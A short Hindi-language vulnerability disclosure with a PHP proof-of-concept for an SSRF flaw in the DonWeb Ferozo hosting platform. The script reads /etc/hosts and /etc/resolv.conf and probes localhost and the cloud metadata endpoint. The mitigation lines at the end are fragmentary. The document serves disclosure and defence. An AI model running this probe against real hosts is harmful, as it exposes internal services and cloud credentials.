
CVE-2025-45955 के लिए Proof-of-concept एक्सप्लॉइट जो DonWeb Ferozo होस्टिंग प्लेटफ़ॉर्म में Server-Side Request Forgery (SSRF) का प्रदर्शन करता है, जिससे आंतरिक बुनियादी ढांचे की मैपिंग और क्लाउड मेटाडेटा गणना संभव होती है।
एक हमलावर Ferozo होस्टिंग प्लेटफॉर्म पर विशेष रूप से तैयार की गई PHP फ़ाइल अपलोड और निष्पादित करके इस कमजोरी का शोषण कर सकता है। फ़ाइल तक पहुँचने पर, यह आंतरिक सेवाओं (जैसे 127.0.0.1, 169.254.169.254, या सर्विस मेश एंडपॉइंट), स्थानीय फ़ाइलों (जैसे file:///etc/passwd), और ज्ञात क्लाउड मेटाडेटा एंडपॉइंट को लक्षित करते हुए SSRF प्रयासों की एक श्रृंखला शुरू करता है। स्क्रिप्ट प्रतिक्रिया या त्रुटि संदेश एकत्र करती है, जिससे हमलावर को आंतरिक बुनियादी ढांचे का मानचित्रण करने, सुलभ सेवाओं की गणना करने और आगे के शोषण के लिए संवेदनशील जानकारी एकत्र करने की अनुमति मिलती है।
निम्नलिखित कोड कमजोरी को प्रदर्शित करता है:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen, आदि) को प्रतिबंधित करें127.0.0.0/8, 169.254.169.254, आदि) तक पहुंच को अवरुद्ध करेंCVE-2025-45955
द्वारा रिपोर्ट किया गया: [Facundo Fernandez, Jinook Kim, Surendra Puppala / सुरक्षा शोधकर्ता | @BYU]